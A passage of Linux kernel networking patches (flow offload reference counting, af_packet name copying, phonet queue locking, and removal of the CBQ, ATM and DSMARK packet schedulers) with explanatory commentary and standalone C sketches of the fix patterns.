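		goto err_link;

	/* This must be LAST: once the hook is registered, traffic may
	 * already be walking over the object.
	 */
	err = step_register_hook();
	if (err)
		goto err_hook;

	return 0;

err_hook:
	undo_link();
err_link:
	undo_alloc();
err_alloc:
	return err;
}

int main(void)
{
	printf("create_object: %d\n", create_object());
	return 0;
}
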
+diff --git a/net/netfilter/nft_flow_offload.c b/net/netfilter/nft_flow_offload.c
+index 3d9f6dda5aeb2..7a8707632a815 100644
+--- a/net/netfilter/nft_flow_offload.c
++++ b/net/netfilter/nft_flow_offload.c
+@@ -250,9 +250,14 @@ static int nft_flow_route(const struct nft_pktinfo *pkt,
+ 		break;
+ 	}
+ 
++	if (!dst_hold_safe(this_dst))
++		return -ENOENT;
++
+ 	nf_route(nft_net(pkt), &other_dst, &fl, false, nft_pf(pkt));
+-	if (!other_dst)
++	if (!other_dst) {
++		dst_release(this_dst);
+ 		return -ENOENT;
++	}
+ 
+ 	nft_default_forward_path(route, this_dst, dir);
+ 	nft_default_forward_path(route, other_dst, !dir);
+@@ -349,8 +354,7 @@ static void nft_flow_offload_eval(const struct nft_expr *expr,
+ 	if (!flow)
+ 		goto err_flow_alloc;
+ 
+-	if (flow_offload_route_init(flow, &route) < 0)
+-		goto err_flow_add;
++	flow_offload_route_init(flow, &route);
+ 
+ 	if (tcph) {
+ 		ct->proto.tcp.seen[0].flags |= IP_CT_TCP_FLAG_BE_LIBERAL;
+@@ -361,12 +365,12 @@ static void nft_flow_offload_eval(const struct nft_expr *expr,
+ 	if (ret < 0)
+ 		goto err_flow_add;
+ 
+-	dst_release(route.tuple[!dir].dst);
+ 	return;
+ 
+ err_flow_add:
+ 	flow_offload_free(flow);
+ err_flow_alloc:
++	dst_release(route.tuple[dir].dst);
+ 	dst_release(route.tuple[!dir].dst);
+ err_flow_route:
+ 	clear_bit(IPS_OFFLOAD_BIT, &ct->status);
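
nft_flow_route() above must take its own reference on this_dst before handing both directions to flow_offload_route_init(), and dst_hold_safe() can fail when the entry is already going away, so each exit drops exactly the references taken so far. A standalone sketch of that checked-grab-and-unwind accounting, again with a toy refcount:

/* Standalone sketch (not kernel code) of the dst_hold_safe() pattern
 * above: grabbing a reference may fail if the object is dying, so the
 * grab is checked and the failure path undoes earlier grabs.
 */
#include <stdbool.h>
#include <stdio.h>

struct obj {
	int refcnt;	/* 0 means the object is being torn down */
};

static bool hold_safe(struct obj *o)
{
	if (o->refcnt == 0)
		return false;	/* too late: do not resurrect */
	o->refcnt++;
	return true;
}

static void put(struct obj *o)
{
	o->refcnt--;
}

static int route_both_directions(struct obj *this_dst, struct obj *other_dst)
{
	if (!hold_safe(this_dst))
		return -1;

	if (!hold_safe(other_dst)) {
		put(this_dst);	/* undo the first grab */
		return -1;
	}

	/* Success: both references now belong to the new flow entry. */
	return 0;
}

int main(void)
{
	struct obj a = { .refcnt = 1 }, dying = { .refcnt = 0 };

	/* Failure path: the reference taken on 'a' is dropped again. */
	printf("result: %d, a.refcnt: %d\n",
	       route_both_directions(&a, &dying), a.refcnt);
	return 0;
}
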
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 51882f07ef70c..c3117350f5fbb 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -3284,7 +3284,7 @@ static int packet_bind_spkt(struct socket *sock, struct sockaddr *uaddr,
+ 			    int addr_len)
+ {
+ 	struct sock *sk = sock->sk;
+-	char name[sizeof(uaddr->sa_data) + 1];
++	char name[sizeof(uaddr->sa_data_min) + 1];
+ 
+ 	/*
+ 	 *	Check legality
+@@ -3295,8 +3295,8 @@ static int packet_bind_spkt(struct socket *sock, struct sockaddr *uaddr,
+ 	/* uaddr->sa_data comes from the userspace, it's not guaranteed to be
+ 	 * zero-terminated.
+ 	 */
+-	memcpy(name, uaddr->sa_data, sizeof(uaddr->sa_data));
+-	name[sizeof(uaddr->sa_data)] = 0;
++	memcpy(name, uaddr->sa_data, sizeof(uaddr->sa_data_min));
++	name[sizeof(uaddr->sa_data_min)] = 0;
+ 
+ 	return packet_do_bind(sk, name, 0, 0);
+ }
+@@ -3566,11 +3566,11 @@ static int packet_getname_spkt(struct socket *sock, struct sockaddr *uaddr,
+ 		return -EOPNOTSUPP;
+ 
+ 	uaddr->sa_family = AF_PACKET;
+-	memset(uaddr->sa_data, 0, sizeof(uaddr->sa_data));
++	memset(uaddr->sa_data, 0, sizeof(uaddr->sa_data_min));
+ 	rcu_read_lock();
+ 	dev = dev_get_by_index_rcu(sock_net(sk), READ_ONCE(pkt_sk(sk)->ifindex));
+ 	if (dev)
+-		strscpy(uaddr->sa_data, dev->name, sizeof(uaddr->sa_data));
++		strscpy(uaddr->sa_data, dev->name, sizeof(uaddr->sa_data_min));
+ 	rcu_read_unlock();
+ 
+ 	return sizeof(*uaddr);
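
The af_packet hunks above size their copies by sa_data_min because sa_data stops being a fixed 14-byte array once struct sockaddr grows a flexible member, and the handler still has to terminate the copy itself since userspace data carries no NUL guarantee. The same defensive copy in a standalone sketch; SA_DATA_MIN here is a local stand-in for sizeof(uaddr->sa_data_min):

/* Standalone sketch (not kernel code): copying a fixed-size, possibly
 * unterminated name out of an untrusted buffer, as packet_bind_spkt()
 * does above.  The copy never overreads the 14-byte window and the
 * result is always NUL-terminated.
 */
#include <stdio.h>
#include <string.h>

#define SA_DATA_MIN 14	/* the historical sizeof(sockaddr.sa_data) */

static void bind_by_name(const char *sa_data /* may lack a NUL */)
{
	char name[SA_DATA_MIN + 1];

	memcpy(name, sa_data, SA_DATA_MIN);	/* fixed-size copy ... */
	name[SA_DATA_MIN] = '\0';		/* ... then terminate */
	printf("device: %s\n", name);
}

int main(void)
{
	char raw[SA_DATA_MIN];

	memset(raw, 'A', sizeof(raw));	/* no NUL anywhere in the source */
	memcpy(raw, "eth0", 4);
	bind_by_name(raw);	/* safe even though raw is unterminated */
	return 0;
}
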
+diff --git a/net/phonet/datagram.c b/net/phonet/datagram.c
+index ff5f49ab236ed..39a6c5713d0b2 100644
+--- a/net/phonet/datagram.c
++++ b/net/phonet/datagram.c
+@@ -35,10 +35,10 @@ static int pn_ioctl(struct sock *sk, int cmd, unsigned long arg)
+ 
+ 	switch (cmd) {
+ 	case SIOCINQ:
+-		lock_sock(sk);
++		spin_lock_bh(&sk->sk_receive_queue.lock);
+ 		skb = skb_peek(&sk->sk_receive_queue);
+ 		answ = skb ? skb->len : 0;
+-		release_sock(sk);
++		spin_unlock_bh(&sk->sk_receive_queue.lock);
+ 		return put_user(answ, (int __user *)arg);
+ 
+ 	case SIOCPNADDRESOURCE:
+diff --git a/net/phonet/pep.c b/net/phonet/pep.c
+index 83ea13a50690b..607f54c23647a 100644
+--- a/net/phonet/pep.c
++++ b/net/phonet/pep.c
+@@ -917,6 +917,37 @@ static int pep_sock_enable(struct sock *sk, struct sockaddr *addr, int len)
+ 	return 0;
+ }
+ 
++static unsigned int pep_first_packet_length(struct sock *sk)
++{
++	struct pep_sock *pn = pep_sk(sk);
++	struct sk_buff_head *q;
++	struct sk_buff *skb;
++	unsigned int len = 0;
++	bool found = false;
++
++	if (sock_flag(sk, SOCK_URGINLINE)) {
++		q = &pn->ctrlreq_queue;
++		spin_lock_bh(&q->lock);
++		skb = skb_peek(q);
++		if (skb) {
++			len = skb->len;
++			found = true;
++		}
++		spin_unlock_bh(&q->lock);
++	}
++
++	if (likely(!found)) {
++		q = &sk->sk_receive_queue;
++		spin_lock_bh(&q->lock);
++		skb = skb_peek(q);
++		if (skb)
++			len = skb->len;
++		spin_unlock_bh(&q->lock);
++	}
++
++	return len;
++}
++
+ static int pep_ioctl(struct sock *sk, int cmd, unsigned long arg)
+ {
+ 	struct pep_sock *pn = pep_sk(sk);
+@@ -930,15 +961,7 @@ static int pep_ioctl(struct sock *sk, int cmd, unsigned long arg)
+ 			break;
+ 		}
+ 
+-		lock_sock(sk);
+-		if (sock_flag(sk, SOCK_URGINLINE) &&
+-		    !skb_queue_empty(&pn->ctrlreq_queue))
+-			answ = skb_peek(&pn->ctrlreq_queue)->len;
+-		else if (!skb_queue_empty(&sk->sk_receive_queue))
+-			answ = skb_peek(&sk->sk_receive_queue)->len;
+-		else
+-			answ = 0;
+-		release_sock(sk);
++		answ = pep_first_packet_length(sk);
+ 		ret = put_user(answ, (int __user *)arg);
+ 		break;
+ 
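
Both phonet hunks above remove "test skb_queue_empty(), then skb_peek()" sequences: the socket lock does not stop BH-context producers and consumers that run under the queue's own spinlock, so the queue can drain between the two steps and the peek dereferences NULL. The fixed shape is a single peek inside the queue lock, as pep_first_packet_length() now does; a compact standalone rendering with a pthread mutex standing in for the queue spinlock (build with -pthread):

/* Standalone sketch (not kernel code): never split an emptiness check
 * and a peek across two lock acquisitions; read the length in the same
 * critical section that found the element.
 */
#include <pthread.h>
#include <stdio.h>

struct pkt {
	struct pkt *next;
	unsigned int len;
};

struct queue {
	pthread_mutex_t lock;
	struct pkt *head;
};

/* Racy shape (the bug): a concurrent consumer holding q->lock can empty
 * the queue between the check and the use.
 */
static unsigned int first_len_racy(struct queue *q)
{
	if (q->head != NULL)		/* check ... */
		return q->head->len;	/* ... then use: head may be gone */
	return 0;
}

/* Safe shape (the fix): one peek, inside the queue's own lock. */
static unsigned int first_len(struct queue *q)
{
	unsigned int len = 0;

	pthread_mutex_lock(&q->lock);
	if (q->head)
		len = q->head->len;
	pthread_mutex_unlock(&q->lock);
	return len;
}

int main(void)
{
	struct pkt p = { .next = NULL, .len = 42 };
	struct queue q = { .lock = PTHREAD_MUTEX_INITIALIZER, .head = &p };

	/* Single-threaded here, so both agree; under concurrency only
	 * first_len() is sound.
	 */
	printf("racy: %u, safe: %u\n", first_len_racy(&q), first_len(&q));
	return 0;
}
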
+diff --git a/net/sched/Kconfig b/net/sched/Kconfig
+index 24cf0bf7c80e5..9c4a80fce794f 100644
+--- a/net/sched/Kconfig
++++ b/net/sched/Kconfig
+@@ -45,23 +45,6 @@ if NET_SCHED
+ 
+ comment "Queueing/Scheduling"
+ 
+-config NET_SCH_CBQ
+-	tristate "Class Based Queueing (CBQ)"
+-	help
+-	  Say Y here if you want to use the Class-Based Queueing (CBQ) packet
+-	  scheduling algorithm. This algorithm classifies the waiting packets
+-	  into a tree-like hierarchy of classes; the leaves of this tree are
+-	  in turn scheduled by separate algorithms.
+-
+-	  See the top of <file:net/sched/sch_cbq.c> for more details.
+-
+-	  CBQ is a commonly used scheduler, so if you're unsure, you should
+-	  say Y here. Then say Y to all the queueing algorithms below that you
+-	  want to use as leaf disciplines.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called sch_cbq.
+-
+ config NET_SCH_HTB
+ 	tristate "Hierarchical Token Bucket (HTB)"
+ 	help
+@@ -85,20 +68,6 @@ config NET_SCH_HFSC
+ 	  To compile this code as a module, choose M here: the
+ 	  module will be called sch_hfsc.
+ 
+-config NET_SCH_ATM
+-	tristate "ATM Virtual Circuits (ATM)"
+-	depends on ATM
+-	help
+-	  Say Y here if you want to use the ATM pseudo-scheduler.  This
+-	  provides a framework for invoking classifiers, which in turn
+-	  select classes of this queuing discipline.  Each class maps
+-	  the flow(s) it is handling to a given virtual circuit.
+-
+-	  See the top of <file:net/sched/sch_atm.c> for more details.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called sch_atm.
+-
+ config NET_SCH_PRIO
+ 	tristate "Multi Band Priority Queueing (PRIO)"
+ 	help
+@@ -217,17 +186,6 @@ config NET_SCH_GRED
+ 	  To compile this code as a module, choose M here: the
+ 	  module will be called sch_gred.
+ 
+-config NET_SCH_DSMARK
+-	tristate "Differentiated Services marker (DSMARK)"
+-	help
+-	  Say Y if you want to schedule packets according to the
+-	  Differentiated Services architecture proposed in RFC 2475.
+-	  Technical information on this method, with pointers to associated
+-	  RFCs, is available at <http://www.gta.ufrj.br/diffserv/>.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called sch_dsmark.
+-
+ config NET_SCH_NETEM
+ 	tristate "Network emulator (NETEM)"
+ 	help
+diff --git a/net/sched/Makefile b/net/sched/Makefile
+index 8a33a35fc50d5..a66ac1e7b79b5 100644
+--- a/net/sched/Makefile
++++ b/net/sched/Makefile
+@@ -33,20 +33,17 @@ obj-$(CONFIG_NET_ACT_TUNNEL_KEY)+= act_tunnel_key.o
+ obj-$(CONFIG_NET_ACT_CT)	+= act_ct.o
+ obj-$(CONFIG_NET_ACT_GATE)	+= act_gate.o
+ obj-$(CONFIG_NET_SCH_FIFO)	+= sch_fifo.o
+-obj-$(CONFIG_NET_SCH_CBQ)	+= sch_cbq.o
+ obj-$(CONFIG_NET_SCH_HTB)	+= sch_htb.o
+ obj-$(CONFIG_NET_SCH_HFSC)	+= sch_hfsc.o
+ obj-$(CONFIG_NET_SCH_RED)	+= sch_red.o
+ obj-$(CONFIG_NET_SCH_GRED)	+= sch_gred.o
+ obj-$(CONFIG_NET_SCH_INGRESS)	+= sch_ingress.o
+-obj-$(CONFIG_NET_SCH_DSMARK)	+= sch_dsmark.o
+ obj-$(CONFIG_NET_SCH_SFB)	+= sch_sfb.o
+ obj-$(CONFIG_NET_SCH_SFQ)	+= sch_sfq.o
+ obj-$(CONFIG_NET_SCH_TBF)	+= sch_tbf.o
+ obj-$(CONFIG_NET_SCH_TEQL)	+= sch_teql.o
+ obj-$(CONFIG_NET_SCH_PRIO)	+= sch_prio.o
+ obj-$(CONFIG_NET_SCH_MULTIQ)	+= sch_multiq.o
+-obj-$(CONFIG_NET_SCH_ATM)	+= sch_atm.o
+ obj-$(CONFIG_NET_SCH_NETEM)	+= sch_netem.o
+ obj-$(CONFIG_NET_SCH_DRR)	+= sch_drr.o
+ obj-$(CONFIG_NET_SCH_PLUG)	+= sch_plug.o
+diff --git a/net/sched/sch_atm.c b/net/sched/sch_atm.c
+deleted file mode 100644
+index 4a981ca90b0bf..0000000000000
+--- a/net/sched/sch_atm.c
++++ /dev/null
+@@ -1,706 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/* net/sched/sch_atm.c - ATM VC selection "queueing discipline" */
+-
+-/* Written 1998-2000 by Werner Almesberger, EPFL ICA */
+-
+-#include <linux/module.h>
+-#include <linux/slab.h>
+-#include <linux/init.h>
+-#include <linux/interrupt.h>
+-#include <linux/string.h>
+-#include <linux/errno.h>
+-#include <linux/skbuff.h>
+-#include <linux/atmdev.h>
+-#include <linux/atmclip.h>
+-#include <linux/rtnetlink.h>
+-#include <linux/file.h>		/* for fput */
+-#include <net/netlink.h>
+-#include <net/pkt_sched.h>
+-#include <net/pkt_cls.h>
+-
+-/*
+- * The ATM queuing discipline provides a framework for invoking classifiers
+- * (aka "filters"), which in turn select classes of this queuing discipline.
+- * Each class maps the flow(s) it is handling to a given VC. Multiple classes
+- * may share the same VC.
+- *
+- * When creating a class, VCs are specified by passing the number of the open
+- * socket descriptor by which the calling process references the VC. The kernel
+- * keeps the VC open at least until all classes using it are removed.
+- *
+- * In this file, most functions are named atm_tc_* to avoid confusion with all
+- * the atm_* in net/atm. This naming convention differs from what's used in the
+- * rest of net/sched.
+- *
+- * Known bugs:
+- *  - sometimes messes up the IP stack
+- *  - any manipulations besides the few operations described in the README, are
+- *    untested and likely to crash the system
+- *  - should lock the flow while there is data in the queue (?)
+- */
+-
+-#define VCC2FLOW(vcc) ((struct atm_flow_data *) ((vcc)->user_back))
+-
+-struct atm_flow_data {
+-	struct Qdisc_class_common common;
+-	struct Qdisc		*q;	/* FIFO, TBF, etc. */
+-	struct tcf_proto __rcu	*filter_list;
+-	struct tcf_block	*block;
+-	struct atm_vcc		*vcc;	/* VCC; NULL if VCC is closed */
+-	void			(*old_pop)(struct atm_vcc *vcc,
+-					   struct sk_buff *skb); /* chaining */
+-	struct atm_qdisc_data	*parent;	/* parent qdisc */
+-	struct socket		*sock;		/* for closing */
+-	int			ref;		/* reference count */
+-	struct gnet_stats_basic_sync	bstats;
+-	struct gnet_stats_queue	qstats;
+-	struct list_head	list;
+-	struct atm_flow_data	*excess;	/* flow for excess traffic;
+-						   NULL to set CLP instead */
+-	int			hdr_len;
+-	unsigned char		hdr[];		/* header data; MUST BE LAST */
+-};
+-
+-struct atm_qdisc_data {
+-	struct atm_flow_data	link;		/* unclassified skbs go here */
+-	struct list_head	flows;		/* NB: "link" is also on this
+-						   list */
+-	struct tasklet_struct	task;		/* dequeue tasklet */
+-};
+-
+-/* ------------------------- Class/flow operations ------------------------- */
+-
+-static inline struct atm_flow_data *lookup_flow(struct Qdisc *sch, u32 classid)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow;
+-
+-	list_for_each_entry(flow, &p->flows, list) {
+-		if (flow->common.classid == classid)
+-			return flow;
+-	}
+-	return NULL;
+-}
+-
+-static int atm_tc_graft(struct Qdisc *sch, unsigned long arg,
+-			struct Qdisc *new, struct Qdisc **old,
+-			struct netlink_ext_ack *extack)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow = (struct atm_flow_data *)arg;
+-
+-	pr_debug("atm_tc_graft(sch %p,[qdisc %p],flow %p,new %p,old %p)\n",
+-		sch, p, flow, new, old);
+-	if (list_empty(&flow->list))
+-		return -EINVAL;
+-	if (!new)
+-		new = &noop_qdisc;
+-	*old = flow->q;
+-	flow->q = new;
+-	if (*old)
+-		qdisc_reset(*old);
+-	return 0;
+-}
+-
+-static struct Qdisc *atm_tc_leaf(struct Qdisc *sch, unsigned long cl)
+-{
+-	struct atm_flow_data *flow = (struct atm_flow_data *)cl;
+-
+-	pr_debug("atm_tc_leaf(sch %p,flow %p)\n", sch, flow);
+-	return flow ? flow->q : NULL;
+-}
+-
+-static unsigned long atm_tc_find(struct Qdisc *sch, u32 classid)
+-{
+-	struct atm_qdisc_data *p __maybe_unused = qdisc_priv(sch);
+-	struct atm_flow_data *flow;
+-
+-	pr_debug("%s(sch %p,[qdisc %p],classid %x)\n", __func__, sch, p, classid);
+-	flow = lookup_flow(sch, classid);
+-	pr_debug("%s: flow %p\n", __func__, flow);
+-	return (unsigned long)flow;
+-}
+-
+-static unsigned long atm_tc_bind_filter(struct Qdisc *sch,
+-					unsigned long parent, u32 classid)
+-{
+-	struct atm_qdisc_data *p __maybe_unused = qdisc_priv(sch);
+-	struct atm_flow_data *flow;
+-
+-	pr_debug("%s(sch %p,[qdisc %p],classid %x)\n", __func__, sch, p, classid);
+-	flow = lookup_flow(sch, classid);
+-	if (flow)
+-		flow->ref++;
+-	pr_debug("%s: flow %p\n", __func__, flow);
+-	return (unsigned long)flow;
+-}
+-
+-/*
+- * atm_tc_put handles all destructions, including the ones that are explicitly
+- * requested (atm_tc_destroy, etc.). The assumption here is that we never drop
+- * anything that still seems to be in use.
+- */
+-static void atm_tc_put(struct Qdisc *sch, unsigned long cl)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow = (struct atm_flow_data *)cl;
+-
+-	pr_debug("atm_tc_put(sch %p,[qdisc %p],flow %p)\n", sch, p, flow);
+-	if (--flow->ref)
+-		return;
+-	pr_debug("atm_tc_put: destroying\n");
+-	list_del_init(&flow->list);
+-	pr_debug("atm_tc_put: qdisc %p\n", flow->q);
+-	qdisc_put(flow->q);
+-	tcf_block_put(flow->block);
+-	if (flow->sock) {
+-		pr_debug("atm_tc_put: f_count %ld\n",
+-			file_count(flow->sock->file));
+-		flow->vcc->pop = flow->old_pop;
+-		sockfd_put(flow->sock);
+-	}
+-	if (flow->excess)
+-		atm_tc_put(sch, (unsigned long)flow->excess);
+-	if (flow != &p->link)
+-		kfree(flow);
+-	/*
+-	 * If flow == &p->link, the qdisc no longer works at this point and
+-	 * needs to be removed. (By the caller of atm_tc_put.)
+-	 */
+-}
+-
+-static void sch_atm_pop(struct atm_vcc *vcc, struct sk_buff *skb)
+-{
+-	struct atm_qdisc_data *p = VCC2FLOW(vcc)->parent;
+-
+-	pr_debug("sch_atm_pop(vcc %p,skb %p,[qdisc %p])\n", vcc, skb, p);
+-	VCC2FLOW(vcc)->old_pop(vcc, skb);
+-	tasklet_schedule(&p->task);
+-}
+-
+-static const u8 llc_oui_ip[] = {
+-	0xaa,			/* DSAP: non-ISO */
+-	0xaa,			/* SSAP: non-ISO */
+-	0x03,			/* Ctrl: Unnumbered Information Command PDU */
+-	0x00,			/* OUI: EtherType */
+-	0x00, 0x00,
+-	0x08, 0x00
+-};				/* Ethertype IP (0800) */
+-
+-static const struct nla_policy atm_policy[TCA_ATM_MAX + 1] = {
+-	[TCA_ATM_FD]		= { .type = NLA_U32 },
+-	[TCA_ATM_EXCESS]	= { .type = NLA_U32 },
+-};
+-
+-static int atm_tc_change(struct Qdisc *sch, u32 classid, u32 parent,
+-			 struct nlattr **tca, unsigned long *arg,
+-			 struct netlink_ext_ack *extack)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow = (struct atm_flow_data *)*arg;
+-	struct atm_flow_data *excess = NULL;
+-	struct nlattr *opt = tca[TCA_OPTIONS];
+-	struct nlattr *tb[TCA_ATM_MAX + 1];
+-	struct socket *sock;
+-	int fd, error, hdr_len;
+-	void *hdr;
+-
+-	pr_debug("atm_tc_change(sch %p,[qdisc %p],classid %x,parent %x,"
+-		"flow %p,opt %p)\n", sch, p, classid, parent, flow, opt);
+-	/*
+-	 * The concept of parents doesn't apply for this qdisc.
+-	 */
+-	if (parent && parent != TC_H_ROOT && parent != sch->handle)
+-		return -EINVAL;
+-	/*
+-	 * ATM classes cannot be changed. In order to change properties of the
+-	 * ATM connection, that socket needs to be modified directly (via the
+-	 * native ATM API. In order to send a flow to a different VC, the old
+-	 * class needs to be removed and a new one added. (This may be changed
+-	 * later.)
+-	 */
+-	if (flow)
+-		return -EBUSY;
+-	if (opt == NULL)
+-		return -EINVAL;
+-
+-	error = nla_parse_nested_deprecated(tb, TCA_ATM_MAX, opt, atm_policy,
+-					    NULL);
+-	if (error < 0)
+-		return error;
+-
+-	if (!tb[TCA_ATM_FD])
+-		return -EINVAL;
+-	fd = nla_get_u32(tb[TCA_ATM_FD]);
+-	pr_debug("atm_tc_change: fd %d\n", fd);
+-	if (tb[TCA_ATM_HDR]) {
+-		hdr_len = nla_len(tb[TCA_ATM_HDR]);
+-		hdr = nla_data(tb[TCA_ATM_HDR]);
+-	} else {
+-		hdr_len = RFC1483LLC_LEN;
+-		hdr = NULL;	/* default LLC/SNAP for IP */
+-	}
+-	if (!tb[TCA_ATM_EXCESS])
+-		excess = NULL;
+-	else {
+-		excess = (struct atm_flow_data *)
+-			atm_tc_find(sch, nla_get_u32(tb[TCA_ATM_EXCESS]));
+-		if (!excess)
+-			return -ENOENT;
+-	}
+-	pr_debug("atm_tc_change: type %d, payload %d, hdr_len %d\n",
+-		 opt->nla_type, nla_len(opt), hdr_len);
+-	sock = sockfd_lookup(fd, &error);
+-	if (!sock)
+-		return error;	/* f_count++ */
+-	pr_debug("atm_tc_change: f_count %ld\n", file_count(sock->file));
+-	if (sock->ops->family != PF_ATMSVC && sock->ops->family != PF_ATMPVC) {
+-		error = -EPROTOTYPE;
+-		goto err_out;
+-	}
+-	/* @@@ should check if the socket is really operational or we'll crash
+-	   on vcc->send */
+-	if (classid) {
+-		if (TC_H_MAJ(classid ^ sch->handle)) {
+-			pr_debug("atm_tc_change: classid mismatch\n");
+-			error = -EINVAL;
+-			goto err_out;
+-		}
+-	} else {
+-		int i;
+-		unsigned long cl;
+-
+-		for (i = 1; i < 0x8000; i++) {
+-			classid = TC_H_MAKE(sch->handle, 0x8000 | i);
+-			cl = atm_tc_find(sch, classid);
+-			if (!cl)
+-				break;
+-		}
+-	}
+-	pr_debug("atm_tc_change: new id %x\n", classid);
+-	flow = kzalloc(sizeof(struct atm_flow_data) + hdr_len, GFP_KERNEL);
+-	pr_debug("atm_tc_change: flow %p\n", flow);
+-	if (!flow) {
+-		error = -ENOBUFS;
+-		goto err_out;
+-	}
+-
+-	error = tcf_block_get(&flow->block, &flow->filter_list, sch,
+-			      extack);
+-	if (error) {
+-		kfree(flow);
+-		goto err_out;
+-	}
+-
+-	flow->q = qdisc_create_dflt(sch->dev_queue, &pfifo_qdisc_ops, classid,
+-				    extack);
+-	if (!flow->q)
+-		flow->q = &noop_qdisc;
+-	pr_debug("atm_tc_change: qdisc %p\n", flow->q);
+-	flow->sock = sock;
+-	flow->vcc = ATM_SD(sock);	/* speedup */
+-	flow->vcc->user_back = flow;
+-	pr_debug("atm_tc_change: vcc %p\n", flow->vcc);
+-	flow->old_pop = flow->vcc->pop;
+-	flow->parent = p;
+-	flow->vcc->pop = sch_atm_pop;
+-	flow->common.classid = classid;
+-	flow->ref = 1;
+-	flow->excess = excess;
+-	list_add(&flow->list, &p->link.list);
+-	flow->hdr_len = hdr_len;
+-	if (hdr)
+-		memcpy(flow->hdr, hdr, hdr_len);
+-	else
+-		memcpy(flow->hdr, llc_oui_ip, sizeof(llc_oui_ip));
+-	*arg = (unsigned long)flow;
+-	return 0;
+-err_out:
+-	sockfd_put(sock);
+-	return error;
+-}
+-
+-static int atm_tc_delete(struct Qdisc *sch, unsigned long arg,
+-			 struct netlink_ext_ack *extack)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow = (struct atm_flow_data *)arg;
+-
+-	pr_debug("atm_tc_delete(sch %p,[qdisc %p],flow %p)\n", sch, p, flow);
+-	if (list_empty(&flow->list))
+-		return -EINVAL;
+-	if (rcu_access_pointer(flow->filter_list) || flow == &p->link)
+-		return -EBUSY;
+-	/*
+-	 * Reference count must be 2: one for "keepalive" (set at class
+-	 * creation), and one for the reference held when calling delete.
+-	 */
+-	if (flow->ref < 2) {
+-		pr_err("atm_tc_delete: flow->ref == %d\n", flow->ref);
+-		return -EINVAL;
+-	}
+-	if (flow->ref > 2)
+-		return -EBUSY;	/* catch references via excess, etc. */
+-	atm_tc_put(sch, arg);
+-	return 0;
+-}
+-
+-static void atm_tc_walk(struct Qdisc *sch, struct qdisc_walker *walker)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow;
+-
+-	pr_debug("atm_tc_walk(sch %p,[qdisc %p],walker %p)\n", sch, p, walker);
+-	if (walker->stop)
+-		return;
+-	list_for_each_entry(flow, &p->flows, list) {
+-		if (!tc_qdisc_stats_dump(sch, (unsigned long)flow, walker))
+-			break;
+-	}
+-}
+-
+-static struct tcf_block *atm_tc_tcf_block(struct Qdisc *sch, unsigned long cl,
+-					  struct netlink_ext_ack *extack)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow = (struct atm_flow_data *)cl;
+-
+-	pr_debug("atm_tc_find_tcf(sch %p,[qdisc %p],flow %p)\n", sch, p, flow);
+-	return flow ? flow->block : p->link.block;
+-}
+-
+-/* --------------------------- Qdisc operations ---------------------------- */
+-
+-static int atm_tc_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+-			  struct sk_buff **to_free)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow;
+-	struct tcf_result res;
+-	int result;
+-	int ret = NET_XMIT_SUCCESS | __NET_XMIT_BYPASS;
+-
+-	pr_debug("atm_tc_enqueue(skb %p,sch %p,[qdisc %p])\n", skb, sch, p);
+-	result = TC_ACT_OK;	/* be nice to gcc */
+-	flow = NULL;
+-	if (TC_H_MAJ(skb->priority) != sch->handle ||
+-	    !(flow = (struct atm_flow_data *)atm_tc_find(sch, skb->priority))) {
+-		struct tcf_proto *fl;
+-
+-		list_for_each_entry(flow, &p->flows, list) {
+-			fl = rcu_dereference_bh(flow->filter_list);
+-			if (fl) {
+-				result = tcf_classify(skb, NULL, fl, &res, true);
+-				if (result < 0)
+-					continue;
+-				if (result == TC_ACT_SHOT)
+-					goto done;
+-
+-				flow = (struct atm_flow_data *)res.class;
+-				if (!flow)
+-					flow = lookup_flow(sch, res.classid);
+-				goto done;
+-			}
+-		}
+-		flow = NULL;
+-done:
+-		;
+-	}
+-	if (!flow) {
+-		flow = &p->link;
+-	} else {
+-		if (flow->vcc)
+-			ATM_SKB(skb)->atm_options = flow->vcc->atm_options;
+-		/*@@@ looks good ... but it's not supposed to work :-) */
+-#ifdef CONFIG_NET_CLS_ACT
+-		switch (result) {
+-		case TC_ACT_QUEUED:
+-		case TC_ACT_STOLEN:
+-		case TC_ACT_TRAP:
+-			__qdisc_drop(skb, to_free);
+-			return NET_XMIT_SUCCESS | __NET_XMIT_STOLEN;
+-		case TC_ACT_SHOT:
+-			__qdisc_drop(skb, to_free);
+-			goto drop;
+-		case TC_ACT_RECLASSIFY:
+-			if (flow->excess)
+-				flow = flow->excess;
+-			else
+-				ATM_SKB(skb)->atm_options |= ATM_ATMOPT_CLP;
+-			break;
+-		}
+-#endif
+-	}
+-
+-	ret = qdisc_enqueue(skb, flow->q, to_free);
+-	if (ret != NET_XMIT_SUCCESS) {
+-drop: __maybe_unused
+-		if (net_xmit_drop_count(ret)) {
+-			qdisc_qstats_drop(sch);
+-			if (flow)
+-				flow->qstats.drops++;
+-		}
+-		return ret;
+-	}
+-	/*
+-	 * Okay, this may seem weird. We pretend we've dropped the packet if
+-	 * it goes via ATM. The reason for this is that the outer qdisc
+-	 * expects to be able to q->dequeue the packet later on if we return
+-	 * success at this place. Also, sch->q.qdisc needs to reflect whether
+-	 * there is a packet egligible for dequeuing or not. Note that the
+-	 * statistics of the outer qdisc are necessarily wrong because of all
+-	 * this. There's currently no correct solution for this.
+-	 */
+-	if (flow == &p->link) {
+-		sch->q.qlen++;
+-		return NET_XMIT_SUCCESS;
+-	}
+-	tasklet_schedule(&p->task);
+-	return NET_XMIT_SUCCESS | __NET_XMIT_BYPASS;
+-}
+-
